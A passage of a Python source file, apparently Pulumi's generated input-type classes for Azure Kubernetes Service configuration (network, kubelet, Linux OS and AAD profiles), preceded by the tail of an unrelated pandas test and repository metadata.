                 'name': 'qux',
                 'start': 0,
                 'step': 2,
                 'stop': 8}
            ],
                'pandas_version': '0.25.0'}
        )})
    result = table.to_pandas()
    # on python 3.5 the column order can differ -> adding check_like=True
    tm.assert_frame_equal(result, expected, check_like=True)
| 35.564169
| 79
| 0.561048
|
4a07c8a001592b32331e309880d98d36f88abe8c
| 155,686
|
py
|
Python
|
sdk/python/pulumi_azure_native/containerservice/_inputs.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/containerservice/_inputs.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/containerservice/_inputs.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from ._enums import *
# Public API of this module: one Pulumi input-type (Args) class per
# containerservice API input shape.
__all__ = [
    'AgentPoolUpgradeSettingsArgs',
    'ContainerServiceLinuxProfileArgs',
    'ContainerServiceNetworkProfileArgs',
    'ContainerServiceSshConfigurationArgs',
    'ContainerServiceSshPublicKeyArgs',
    'CreationDataArgs',
    'ExtendedLocationArgs',
    'KubeletConfigArgs',
    'LinuxOSConfigArgs',
    'ManagedClusterAADProfileArgs',
    'ManagedClusterAPIServerAccessProfileArgs',
    'ManagedClusterAddonProfileArgs',
    'ManagedClusterAgentPoolProfileArgs',
    'ManagedClusterAutoUpgradeProfileArgs',
    'ManagedClusterHTTPProxyConfigArgs',
    'ManagedClusterIdentityArgs',
    'ManagedClusterLoadBalancerProfileManagedOutboundIPsArgs',
    'ManagedClusterLoadBalancerProfileOutboundIPPrefixesArgs',
    'ManagedClusterLoadBalancerProfileOutboundIPsArgs',
    'ManagedClusterLoadBalancerProfileArgs',
    'ManagedClusterPodIdentityExceptionArgs',
    'ManagedClusterPodIdentityProfileArgs',
    'ManagedClusterPodIdentityArgs',
    'ManagedClusterPropertiesAutoScalerProfileArgs',
    'ManagedClusterPropertiesIdentityProfileArgs',
    'ManagedClusterSKUArgs',
    'ManagedClusterServicePrincipalProfileArgs',
    'ManagedClusterWindowsProfileArgs',
    'NetworkProfileArgs',
    'OpenShiftManagedClusterAADIdentityProviderArgs',
    'OpenShiftManagedClusterAgentPoolProfileArgs',
    'OpenShiftManagedClusterAuthProfileArgs',
    'OpenShiftManagedClusterIdentityProviderArgs',
    'OpenShiftManagedClusterMasterPoolProfileArgs',
    'OpenShiftRouterProfileArgs',
    'PrivateEndpointArgs',
    'PrivateLinkResourceArgs',
    'PrivateLinkServiceConnectionStateArgs',
    'PurchasePlanArgs',
    'ResourceReferenceArgs',
    'SysctlConfigArgs',
    'TimeInWeekArgs',
    'TimeSpanArgs',
    'UserAssignedIdentityArgs',
]
# NOTE(review): generated by the Pulumi SDK Generator — comments only,
# code left byte-identical.
@pulumi.input_type
class AgentPoolUpgradeSettingsArgs:
    def __init__(__self__, *,
                 max_surge: Optional[pulumi.Input[str]] = None):
        """
        Settings for upgrading an agentpool
        :param pulumi.Input[str] max_surge: Count or percentage of additional nodes to be added during upgrade. If empty uses AKS default
        """
        # Only set when provided, so Pulumi can distinguish "unset" from an
        # explicit value.
        if max_surge is not None:
            pulumi.set(__self__, "max_surge", max_surge)

    @property
    @pulumi.getter(name="maxSurge")
    def max_surge(self) -> Optional[pulumi.Input[str]]:
        """
        Count or percentage of additional nodes to be added during upgrade. If empty uses AKS default
        """
        return pulumi.get(self, "max_surge")

    @max_surge.setter
    def max_surge(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "max_surge", value)
# NOTE(review): generated by the Pulumi SDK Generator — comments only,
# code left byte-identical.
@pulumi.input_type
class ContainerServiceLinuxProfileArgs:
    def __init__(__self__, *,
                 admin_username: pulumi.Input[str],
                 ssh: pulumi.Input['ContainerServiceSshConfigurationArgs']):
        """
        Profile for Linux VMs in the container service cluster.
        :param pulumi.Input[str] admin_username: The administrator username to use for Linux VMs.
        :param pulumi.Input['ContainerServiceSshConfigurationArgs'] ssh: SSH configuration for Linux-based VMs running on Azure.
        """
        # Both fields are required by the API, hence set unconditionally.
        pulumi.set(__self__, "admin_username", admin_username)
        pulumi.set(__self__, "ssh", ssh)

    @property
    @pulumi.getter(name="adminUsername")
    def admin_username(self) -> pulumi.Input[str]:
        """
        The administrator username to use for Linux VMs.
        """
        return pulumi.get(self, "admin_username")

    @admin_username.setter
    def admin_username(self, value: pulumi.Input[str]):
        pulumi.set(self, "admin_username", value)

    @property
    @pulumi.getter
    def ssh(self) -> pulumi.Input['ContainerServiceSshConfigurationArgs']:
        """
        SSH configuration for Linux-based VMs running on Azure.
        """
        return pulumi.get(self, "ssh")

    @ssh.setter
    def ssh(self, value: pulumi.Input['ContainerServiceSshConfigurationArgs']):
        pulumi.set(self, "ssh", value)
@pulumi.input_type
class ContainerServiceNetworkProfileArgs:
    def __init__(__self__, *,
                 dns_service_ip: Optional[pulumi.Input[str]] = None,
                 docker_bridge_cidr: Optional[pulumi.Input[str]] = None,
                 load_balancer_profile: Optional[pulumi.Input['ManagedClusterLoadBalancerProfileArgs']] = None,
                 load_balancer_sku: Optional[pulumi.Input[Union[str, 'LoadBalancerSku']]] = None,
                 network_mode: Optional[pulumi.Input[Union[str, 'NetworkMode']]] = None,
                 network_plugin: Optional[pulumi.Input[Union[str, 'NetworkPlugin']]] = None,
                 network_policy: Optional[pulumi.Input[Union[str, 'NetworkPolicy']]] = None,
                 outbound_type: Optional[pulumi.Input[Union[str, 'OutboundType']]] = None,
                 pod_cidr: Optional[pulumi.Input[str]] = None,
                 service_cidr: Optional[pulumi.Input[str]] = None):
        """
        Profile of network configuration.
        :param pulumi.Input[str] dns_service_ip: An IP address assigned to the Kubernetes DNS service. It must be within the Kubernetes service address range specified in serviceCidr.
        :param pulumi.Input[str] docker_bridge_cidr: A CIDR notation IP range assigned to the Docker bridge network. It must not overlap with any Subnet IP ranges or the Kubernetes service address range.
        :param pulumi.Input['ManagedClusterLoadBalancerProfileArgs'] load_balancer_profile: Profile of the cluster load balancer.
        :param pulumi.Input[Union[str, 'LoadBalancerSku']] load_balancer_sku: The load balancer sku for the managed cluster.
        :param pulumi.Input[Union[str, 'NetworkMode']] network_mode: Network mode used for building Kubernetes network.
        :param pulumi.Input[Union[str, 'NetworkPlugin']] network_plugin: Network plugin used for building Kubernetes network.
        :param pulumi.Input[Union[str, 'NetworkPolicy']] network_policy: Network policy used for building Kubernetes network.
        :param pulumi.Input[Union[str, 'OutboundType']] outbound_type: The outbound (egress) routing method.
        :param pulumi.Input[str] pod_cidr: A CIDR notation IP range from which to assign pod IPs when kubenet is used.
        :param pulumi.Input[str] service_cidr: A CIDR notation IP range from which to assign service cluster IPs. It must not overlap with any Subnet IP ranges.
        """
        # Fields that fall back to an AKS default when the caller omits them.
        fallbacks = {
            "dns_service_ip": '10.0.0.10',
            "docker_bridge_cidr": '172.17.0.1/16',
            "network_plugin": 'kubenet',
            "outbound_type": 'loadBalancer',
            "pod_cidr": '10.244.0.0/16',
            "service_cidr": '10.0.0.0/16',
        }
        # Record each field once, in declaration order; defaulted fields are
        # always stored, the rest only when a value was supplied.
        supplied = {
            "dns_service_ip": dns_service_ip,
            "docker_bridge_cidr": docker_bridge_cidr,
            "load_balancer_profile": load_balancer_profile,
            "load_balancer_sku": load_balancer_sku,
            "network_mode": network_mode,
            "network_plugin": network_plugin,
            "network_policy": network_policy,
            "outbound_type": outbound_type,
            "pod_cidr": pod_cidr,
            "service_cidr": service_cidr,
        }
        for key, val in supplied.items():
            if val is None:
                val = fallbacks.get(key)
            if val is not None:
                pulumi.set(__self__, key, val)

    @property
    @pulumi.getter(name="dnsServiceIP")
    def dns_service_ip(self) -> Optional[pulumi.Input[str]]:
        """
        An IP address assigned to the Kubernetes DNS service. It must be within the Kubernetes service address range specified in serviceCidr.
        """
        return pulumi.get(self, "dns_service_ip")

    @dns_service_ip.setter
    def dns_service_ip(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "dns_service_ip", value)

    @property
    @pulumi.getter(name="dockerBridgeCidr")
    def docker_bridge_cidr(self) -> Optional[pulumi.Input[str]]:
        """
        A CIDR notation IP range assigned to the Docker bridge network. It must not overlap with any Subnet IP ranges or the Kubernetes service address range.
        """
        return pulumi.get(self, "docker_bridge_cidr")

    @docker_bridge_cidr.setter
    def docker_bridge_cidr(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "docker_bridge_cidr", value)

    @property
    @pulumi.getter(name="loadBalancerProfile")
    def load_balancer_profile(self) -> Optional[pulumi.Input['ManagedClusterLoadBalancerProfileArgs']]:
        """
        Profile of the cluster load balancer.
        """
        return pulumi.get(self, "load_balancer_profile")

    @load_balancer_profile.setter
    def load_balancer_profile(self, value: Optional[pulumi.Input['ManagedClusterLoadBalancerProfileArgs']]):
        pulumi.set(self, "load_balancer_profile", value)

    @property
    @pulumi.getter(name="loadBalancerSku")
    def load_balancer_sku(self) -> Optional[pulumi.Input[Union[str, 'LoadBalancerSku']]]:
        """
        The load balancer sku for the managed cluster.
        """
        return pulumi.get(self, "load_balancer_sku")

    @load_balancer_sku.setter
    def load_balancer_sku(self, value: Optional[pulumi.Input[Union[str, 'LoadBalancerSku']]]):
        pulumi.set(self, "load_balancer_sku", value)

    @property
    @pulumi.getter(name="networkMode")
    def network_mode(self) -> Optional[pulumi.Input[Union[str, 'NetworkMode']]]:
        """
        Network mode used for building Kubernetes network.
        """
        return pulumi.get(self, "network_mode")

    @network_mode.setter
    def network_mode(self, value: Optional[pulumi.Input[Union[str, 'NetworkMode']]]):
        pulumi.set(self, "network_mode", value)

    @property
    @pulumi.getter(name="networkPlugin")
    def network_plugin(self) -> Optional[pulumi.Input[Union[str, 'NetworkPlugin']]]:
        """
        Network plugin used for building Kubernetes network.
        """
        return pulumi.get(self, "network_plugin")

    @network_plugin.setter
    def network_plugin(self, value: Optional[pulumi.Input[Union[str, 'NetworkPlugin']]]):
        pulumi.set(self, "network_plugin", value)

    @property
    @pulumi.getter(name="networkPolicy")
    def network_policy(self) -> Optional[pulumi.Input[Union[str, 'NetworkPolicy']]]:
        """
        Network policy used for building Kubernetes network.
        """
        return pulumi.get(self, "network_policy")

    @network_policy.setter
    def network_policy(self, value: Optional[pulumi.Input[Union[str, 'NetworkPolicy']]]):
        pulumi.set(self, "network_policy", value)

    @property
    @pulumi.getter(name="outboundType")
    def outbound_type(self) -> Optional[pulumi.Input[Union[str, 'OutboundType']]]:
        """
        The outbound (egress) routing method.
        """
        return pulumi.get(self, "outbound_type")

    @outbound_type.setter
    def outbound_type(self, value: Optional[pulumi.Input[Union[str, 'OutboundType']]]):
        pulumi.set(self, "outbound_type", value)

    @property
    @pulumi.getter(name="podCidr")
    def pod_cidr(self) -> Optional[pulumi.Input[str]]:
        """
        A CIDR notation IP range from which to assign pod IPs when kubenet is used.
        """
        return pulumi.get(self, "pod_cidr")

    @pod_cidr.setter
    def pod_cidr(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "pod_cidr", value)

    @property
    @pulumi.getter(name="serviceCidr")
    def service_cidr(self) -> Optional[pulumi.Input[str]]:
        """
        A CIDR notation IP range from which to assign service cluster IPs. It must not overlap with any Subnet IP ranges.
        """
        return pulumi.get(self, "service_cidr")

    @service_cidr.setter
    def service_cidr(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "service_cidr", value)
@pulumi.input_type
class ContainerServiceSshConfigurationArgs:
    def __init__(__self__, *,
                 public_keys: pulumi.Input[Sequence[pulumi.Input['ContainerServiceSshPublicKeyArgs']]]):
        """
        SSH configuration for Linux-based VMs running on Azure.
        :param pulumi.Input[Sequence[pulumi.Input['ContainerServiceSshPublicKeyArgs']]] public_keys: The list of SSH public keys used to authenticate with Linux-based VMs. Only expect one key specified.
        """
        # Required field: always stored.
        pulumi.set(__self__, "public_keys", public_keys)

    @property
    @pulumi.getter(name="publicKeys")
    def public_keys(self) -> pulumi.Input[Sequence[pulumi.Input['ContainerServiceSshPublicKeyArgs']]]:
        """
        The list of SSH public keys used to authenticate with Linux-based VMs. Only expect one key specified.
        """
        return pulumi.get(self, "public_keys")

    @public_keys.setter
    def public_keys(self, value: pulumi.Input[Sequence[pulumi.Input['ContainerServiceSshPublicKeyArgs']]]):
        pulumi.set(self, "public_keys", value)
@pulumi.input_type
class ContainerServiceSshPublicKeyArgs:
    def __init__(__self__, *,
                 key_data: pulumi.Input[str]):
        """
        Contains information about SSH certificate public key data.
        :param pulumi.Input[str] key_data: Certificate public key used to authenticate with VMs through SSH. The certificate must be in PEM format with or without headers.
        """
        # Required field: always stored.
        pulumi.set(__self__, "key_data", key_data)

    @property
    @pulumi.getter(name="keyData")
    def key_data(self) -> pulumi.Input[str]:
        """
        Certificate public key used to authenticate with VMs through SSH. The certificate must be in PEM format with or without headers.
        """
        return pulumi.get(self, "key_data")

    @key_data.setter
    def key_data(self, value: pulumi.Input[str]):
        pulumi.set(self, "key_data", value)
@pulumi.input_type
class CreationDataArgs:
    def __init__(__self__, *,
                 source_resource_id: Optional[pulumi.Input[str]] = None):
        """
        Data used when creating a target resource from a source resource.
        :param pulumi.Input[str] source_resource_id: This is the ARM ID of the source object to be used to create the target object.
        """
        # Guard clause: skip storage when no source resource was given.
        if source_resource_id is None:
            return
        pulumi.set(__self__, "source_resource_id", source_resource_id)

    @property
    @pulumi.getter(name="sourceResourceId")
    def source_resource_id(self) -> Optional[pulumi.Input[str]]:
        """
        This is the ARM ID of the source object to be used to create the target object.
        """
        return pulumi.get(self, "source_resource_id")

    @source_resource_id.setter
    def source_resource_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "source_resource_id", value)
@pulumi.input_type
class ExtendedLocationArgs:
    def __init__(__self__, *,
                 name: Optional[pulumi.Input[str]] = None,
                 type: Optional[pulumi.Input[Union[str, 'ExtendedLocationTypes']]] = None):
        """
        The complex type of the extended location.
        :param pulumi.Input[str] name: The name of the extended location.
        :param pulumi.Input[Union[str, 'ExtendedLocationTypes']] type: The type of the extended location.
        """
        # Store only the fields the caller actually provided.
        for key, val in (("name", name), ("type", type)):
            if val is not None:
                pulumi.set(__self__, key, val)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the extended location.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[Union[str, 'ExtendedLocationTypes']]]:
        """
        The type of the extended location.
        """
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: Optional[pulumi.Input[Union[str, 'ExtendedLocationTypes']]]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class KubeletConfigArgs:
    def __init__(__self__, *,
                 allowed_unsafe_sysctls: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 container_log_max_files: Optional[pulumi.Input[int]] = None,
                 container_log_max_size_mb: Optional[pulumi.Input[int]] = None,
                 cpu_cfs_quota: Optional[pulumi.Input[bool]] = None,
                 cpu_cfs_quota_period: Optional[pulumi.Input[str]] = None,
                 cpu_manager_policy: Optional[pulumi.Input[str]] = None,
                 fail_swap_on: Optional[pulumi.Input[bool]] = None,
                 image_gc_high_threshold: Optional[pulumi.Input[int]] = None,
                 image_gc_low_threshold: Optional[pulumi.Input[int]] = None,
                 pod_max_pids: Optional[pulumi.Input[int]] = None,
                 topology_manager_policy: Optional[pulumi.Input[str]] = None):
        """
        Kubelet configurations of agent nodes.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] allowed_unsafe_sysctls: Allowlist of unsafe sysctls or unsafe sysctl patterns (ending in `*`).
        :param pulumi.Input[int] container_log_max_files: The maximum number of container log files that can be present for a container. The number must be ≥ 2.
        :param pulumi.Input[int] container_log_max_size_mb: The maximum size (e.g. 10Mi) of container log file before it is rotated.
        :param pulumi.Input[bool] cpu_cfs_quota: Enable CPU CFS quota enforcement for containers that specify CPU limits.
        :param pulumi.Input[str] cpu_cfs_quota_period: Sets CPU CFS quota period value.
        :param pulumi.Input[str] cpu_manager_policy: CPU Manager policy to use.
        :param pulumi.Input[bool] fail_swap_on: If set to true it will make the Kubelet fail to start if swap is enabled on the node.
        :param pulumi.Input[int] image_gc_high_threshold: The percent of disk usage after which image garbage collection is always run.
        :param pulumi.Input[int] image_gc_low_threshold: The percent of disk usage before which image garbage collection is never run.
        :param pulumi.Input[int] pod_max_pids: The maximum number of processes per pod.
        :param pulumi.Input[str] topology_manager_policy: Topology Manager policy to use.
        """
        # Every field is optional; store each one only when supplied,
        # preserving declaration order.
        optional_fields = (
            ("allowed_unsafe_sysctls", allowed_unsafe_sysctls),
            ("container_log_max_files", container_log_max_files),
            ("container_log_max_size_mb", container_log_max_size_mb),
            ("cpu_cfs_quota", cpu_cfs_quota),
            ("cpu_cfs_quota_period", cpu_cfs_quota_period),
            ("cpu_manager_policy", cpu_manager_policy),
            ("fail_swap_on", fail_swap_on),
            ("image_gc_high_threshold", image_gc_high_threshold),
            ("image_gc_low_threshold", image_gc_low_threshold),
            ("pod_max_pids", pod_max_pids),
            ("topology_manager_policy", topology_manager_policy),
        )
        for key, val in optional_fields:
            if val is not None:
                pulumi.set(__self__, key, val)

    @property
    @pulumi.getter(name="allowedUnsafeSysctls")
    def allowed_unsafe_sysctls(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Allowlist of unsafe sysctls or unsafe sysctl patterns (ending in `*`).
        """
        return pulumi.get(self, "allowed_unsafe_sysctls")

    @allowed_unsafe_sysctls.setter
    def allowed_unsafe_sysctls(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "allowed_unsafe_sysctls", value)

    @property
    @pulumi.getter(name="containerLogMaxFiles")
    def container_log_max_files(self) -> Optional[pulumi.Input[int]]:
        """
        The maximum number of container log files that can be present for a container. The number must be ≥ 2.
        """
        return pulumi.get(self, "container_log_max_files")

    @container_log_max_files.setter
    def container_log_max_files(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "container_log_max_files", value)

    @property
    @pulumi.getter(name="containerLogMaxSizeMB")
    def container_log_max_size_mb(self) -> Optional[pulumi.Input[int]]:
        """
        The maximum size (e.g. 10Mi) of container log file before it is rotated.
        """
        return pulumi.get(self, "container_log_max_size_mb")

    @container_log_max_size_mb.setter
    def container_log_max_size_mb(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "container_log_max_size_mb", value)

    @property
    @pulumi.getter(name="cpuCfsQuota")
    def cpu_cfs_quota(self) -> Optional[pulumi.Input[bool]]:
        """
        Enable CPU CFS quota enforcement for containers that specify CPU limits.
        """
        return pulumi.get(self, "cpu_cfs_quota")

    @cpu_cfs_quota.setter
    def cpu_cfs_quota(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "cpu_cfs_quota", value)

    @property
    @pulumi.getter(name="cpuCfsQuotaPeriod")
    def cpu_cfs_quota_period(self) -> Optional[pulumi.Input[str]]:
        """
        Sets CPU CFS quota period value.
        """
        return pulumi.get(self, "cpu_cfs_quota_period")

    @cpu_cfs_quota_period.setter
    def cpu_cfs_quota_period(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "cpu_cfs_quota_period", value)

    @property
    @pulumi.getter(name="cpuManagerPolicy")
    def cpu_manager_policy(self) -> Optional[pulumi.Input[str]]:
        """
        CPU Manager policy to use.
        """
        return pulumi.get(self, "cpu_manager_policy")

    @cpu_manager_policy.setter
    def cpu_manager_policy(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "cpu_manager_policy", value)

    @property
    @pulumi.getter(name="failSwapOn")
    def fail_swap_on(self) -> Optional[pulumi.Input[bool]]:
        """
        If set to true it will make the Kubelet fail to start if swap is enabled on the node.
        """
        return pulumi.get(self, "fail_swap_on")

    @fail_swap_on.setter
    def fail_swap_on(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "fail_swap_on", value)

    @property
    @pulumi.getter(name="imageGcHighThreshold")
    def image_gc_high_threshold(self) -> Optional[pulumi.Input[int]]:
        """
        The percent of disk usage after which image garbage collection is always run.
        """
        return pulumi.get(self, "image_gc_high_threshold")

    @image_gc_high_threshold.setter
    def image_gc_high_threshold(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "image_gc_high_threshold", value)

    @property
    @pulumi.getter(name="imageGcLowThreshold")
    def image_gc_low_threshold(self) -> Optional[pulumi.Input[int]]:
        """
        The percent of disk usage before which image garbage collection is never run.
        """
        return pulumi.get(self, "image_gc_low_threshold")

    @image_gc_low_threshold.setter
    def image_gc_low_threshold(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "image_gc_low_threshold", value)

    @property
    @pulumi.getter(name="podMaxPids")
    def pod_max_pids(self) -> Optional[pulumi.Input[int]]:
        """
        The maximum number of processes per pod.
        """
        return pulumi.get(self, "pod_max_pids")

    @pod_max_pids.setter
    def pod_max_pids(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "pod_max_pids", value)

    @property
    @pulumi.getter(name="topologyManagerPolicy")
    def topology_manager_policy(self) -> Optional[pulumi.Input[str]]:
        """
        Topology Manager policy to use.
        """
        return pulumi.get(self, "topology_manager_policy")

    @topology_manager_policy.setter
    def topology_manager_policy(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "topology_manager_policy", value)
@pulumi.input_type
class LinuxOSConfigArgs:
    def __init__(__self__, *,
                 swap_file_size_mb: Optional[pulumi.Input[int]] = None,
                 sysctls: Optional[pulumi.Input['SysctlConfigArgs']] = None,
                 transparent_huge_page_defrag: Optional[pulumi.Input[str]] = None,
                 transparent_huge_page_enabled: Optional[pulumi.Input[str]] = None):
        """
        OS configurations of Linux agent nodes.
        :param pulumi.Input[int] swap_file_size_mb: SwapFileSizeMB specifies size in MB of a swap file will be created on each node.
        :param pulumi.Input['SysctlConfigArgs'] sysctls: Sysctl settings for Linux agent nodes.
        :param pulumi.Input[str] transparent_huge_page_defrag: Transparent Huge Page defrag configuration.
        :param pulumi.Input[str] transparent_huge_page_enabled: Transparent Huge Page enabled configuration.
        """
        # All fields are optional; record only those the caller supplied.
        optional_fields = (
            ("swap_file_size_mb", swap_file_size_mb),
            ("sysctls", sysctls),
            ("transparent_huge_page_defrag", transparent_huge_page_defrag),
            ("transparent_huge_page_enabled", transparent_huge_page_enabled),
        )
        for key, val in optional_fields:
            if val is not None:
                pulumi.set(__self__, key, val)

    @property
    @pulumi.getter(name="swapFileSizeMB")
    def swap_file_size_mb(self) -> Optional[pulumi.Input[int]]:
        """
        SwapFileSizeMB specifies size in MB of a swap file will be created on each node.
        """
        return pulumi.get(self, "swap_file_size_mb")

    @swap_file_size_mb.setter
    def swap_file_size_mb(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "swap_file_size_mb", value)

    @property
    @pulumi.getter
    def sysctls(self) -> Optional[pulumi.Input['SysctlConfigArgs']]:
        """
        Sysctl settings for Linux agent nodes.
        """
        return pulumi.get(self, "sysctls")

    @sysctls.setter
    def sysctls(self, value: Optional[pulumi.Input['SysctlConfigArgs']]):
        pulumi.set(self, "sysctls", value)

    @property
    @pulumi.getter(name="transparentHugePageDefrag")
    def transparent_huge_page_defrag(self) -> Optional[pulumi.Input[str]]:
        """
        Transparent Huge Page defrag configuration.
        """
        return pulumi.get(self, "transparent_huge_page_defrag")

    @transparent_huge_page_defrag.setter
    def transparent_huge_page_defrag(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "transparent_huge_page_defrag", value)

    @property
    @pulumi.getter(name="transparentHugePageEnabled")
    def transparent_huge_page_enabled(self) -> Optional[pulumi.Input[str]]:
        """
        Transparent Huge Page enabled configuration.
        """
        return pulumi.get(self, "transparent_huge_page_enabled")

    @transparent_huge_page_enabled.setter
    def transparent_huge_page_enabled(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "transparent_huge_page_enabled", value)
@pulumi.input_type
class ManagedClusterAADProfileArgs:
    def __init__(__self__, *,
                 admin_group_object_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 client_app_id: Optional[pulumi.Input[str]] = None,
                 enable_azure_rbac: Optional[pulumi.Input[bool]] = None,
                 managed: Optional[pulumi.Input[bool]] = None,
                 server_app_id: Optional[pulumi.Input[str]] = None,
                 server_app_secret: Optional[pulumi.Input[str]] = None,
                 tenant_id: Optional[pulumi.Input[str]] = None):
        """
        AADProfile specifies attributes for Azure Active Directory integration.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] admin_group_object_ids: AAD group object IDs that will have admin role of the cluster.
        :param pulumi.Input[str] client_app_id: The client AAD application ID.
        :param pulumi.Input[bool] enable_azure_rbac: Whether to enable Azure RBAC for Kubernetes authorization.
        :param pulumi.Input[bool] managed: Whether to enable managed AAD.
        :param pulumi.Input[str] server_app_id: The server AAD application ID.
        :param pulumi.Input[str] server_app_secret: The server AAD application secret.
        :param pulumi.Input[str] tenant_id: The AAD tenant ID to use for authentication. If not specified, will use the tenant of the deployment subscription.
        """
        # All fields are optional; record only those the caller supplied.
        optional_fields = (
            ("admin_group_object_ids", admin_group_object_ids),
            ("client_app_id", client_app_id),
            ("enable_azure_rbac", enable_azure_rbac),
            ("managed", managed),
            ("server_app_id", server_app_id),
            ("server_app_secret", server_app_secret),
            ("tenant_id", tenant_id),
        )
        for key, val in optional_fields:
            if val is not None:
                pulumi.set(__self__, key, val)

    @property
    @pulumi.getter(name="adminGroupObjectIDs")
    def admin_group_object_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        AAD group object IDs that will have admin role of the cluster.
        """
        return pulumi.get(self, "admin_group_object_ids")

    @admin_group_object_ids.setter
    def admin_group_object_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "admin_group_object_ids", value)

    @property
    @pulumi.getter(name="clientAppID")
    def client_app_id(self) -> Optional[pulumi.Input[str]]:
        """
        The client AAD application ID.
        """
        return pulumi.get(self, "client_app_id")

    @client_app_id.setter
    def client_app_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "client_app_id", value)

    @property
    @pulumi.getter(name="enableAzureRBAC")
    def enable_azure_rbac(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether to enable Azure RBAC for Kubernetes authorization.
        """
        return pulumi.get(self, "enable_azure_rbac")

    @enable_azure_rbac.setter
    def enable_azure_rbac(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enable_azure_rbac", value)

    @property
    @pulumi.getter
    def managed(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether to enable managed AAD.
        """
        return pulumi.get(self, "managed")

    @managed.setter
    def managed(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "managed", value)

    @property
    @pulumi.getter(name="serverAppID")
    def server_app_id(self) -> Optional[pulumi.Input[str]]:
        """
        The server AAD application ID.
        """
        return pulumi.get(self, "server_app_id")

    @server_app_id.setter
    def server_app_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "server_app_id", value)

    @property
    @pulumi.getter(name="serverAppSecret")
    def server_app_secret(self) -> Optional[pulumi.Input[str]]:
        """
        The server AAD application secret.
        """
        return pulumi.get(self, "server_app_secret")

    @server_app_secret.setter
    def server_app_secret(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "server_app_secret", value)

    @property
    @pulumi.getter(name="tenantID")
    def tenant_id(self) -> Optional[pulumi.Input[str]]:
        """
        The AAD tenant ID to use for authentication. If not specified, will use the tenant of the deployment subscription.
        """
        return pulumi.get(self, "tenant_id")

    @tenant_id.setter
    def tenant_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "tenant_id", value)
@pulumi.input_type
class ManagedClusterAPIServerAccessProfileArgs:
    def __init__(__self__, *,
                 authorized_ip_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 enable_private_cluster: Optional[pulumi.Input[bool]] = None,
                 private_dns_zone: Optional[pulumi.Input[str]] = None):
        """
        Access profile for managed cluster API server.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] authorized_ip_ranges: Authorized IP Ranges to kubernetes API server.
        :param pulumi.Input[bool] enable_private_cluster: Whether to create the cluster as a private cluster or not.
        :param pulumi.Input[str] private_dns_zone: Private dns zone mode for private cluster.
        """
        # All fields are optional; record only those the caller supplied.
        optional_fields = (
            ("authorized_ip_ranges", authorized_ip_ranges),
            ("enable_private_cluster", enable_private_cluster),
            ("private_dns_zone", private_dns_zone),
        )
        for key, val in optional_fields:
            if val is not None:
                pulumi.set(__self__, key, val)

    @property
    @pulumi.getter(name="authorizedIPRanges")
    def authorized_ip_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Authorized IP Ranges to kubernetes API server.
        """
        return pulumi.get(self, "authorized_ip_ranges")

    @authorized_ip_ranges.setter
    def authorized_ip_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "authorized_ip_ranges", value)

    @property
    @pulumi.getter(name="enablePrivateCluster")
    def enable_private_cluster(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether to create the cluster as a private cluster or not.
        """
